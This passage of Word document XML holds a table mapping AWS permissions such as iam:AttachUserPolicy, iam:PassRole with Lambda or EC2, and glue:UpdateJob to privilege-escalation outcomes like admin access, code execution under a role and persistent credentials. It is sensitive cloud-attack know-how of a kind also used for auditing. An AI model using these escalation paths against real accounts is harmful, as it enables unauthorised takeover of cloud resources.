                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>StartBuild</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1AA9BCCB" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D6878D7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cognito-identity:UpdateIdentityPool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF0805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identity pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6479225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Unauth principal with role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16281491" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateIdentityPool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3FCC0DDE" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBC8179" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ec2:RunInstances</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PassRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66BFF4F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Role with broader scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D25AB3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Credentials on instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5926C7CE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RunInstances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="22D7F371" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="123CC3EF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ec2:CreateLaunchTemplateVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="403569D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Existing template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C2A118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Next-launch persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54F0541E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateLaunchTemplateVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="5BD02C80" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A30925" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>events:PutRule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutTargets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A2BB2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Existing target + role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BF220B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Scheduled execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72DE78E0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutRule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutTargets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="2709031C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C47FF8B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>glue:UpdateJob</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PassRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5123578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job + role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E2B72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RCE under job role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B9A3C53" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateJob</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="58E613BB" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FC9238A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:AddUserToGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02651AD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Privileged group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC4267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Group's permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F047415" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AddUserToGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="5C2408BF" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D8FDF6D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:AttachUserPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637B210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AdministratorAccess policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05AFE25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Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="478BE02D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AttachUserPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="52608F8C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D705E87" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:CreateAccessKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE7446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Any user whose policy is rich</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6537D17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Persistent creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296CEA2D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateAccessKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="65ECD6CD" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D6FC779" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:CreateLoginProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2444501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Any user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC141B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Console access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7004097C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateLoginProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="45ACB3CC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49F960F2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:CreatePolicyVersion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SetDefaultPolicyVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F09020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Attached managed policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="179F7F6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Arbitrary policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE7DA40" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreatePolicyVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="67AA1D95" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D7A7E31" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PassRole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F47D28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Rich role + existing function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7165404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RCE under role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="545F50C3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateFunctionConfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4C701274" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="043DC7AE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:PutUserPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51221CE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user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24BC8B3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Arbitrary policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70356BA8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutUserPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
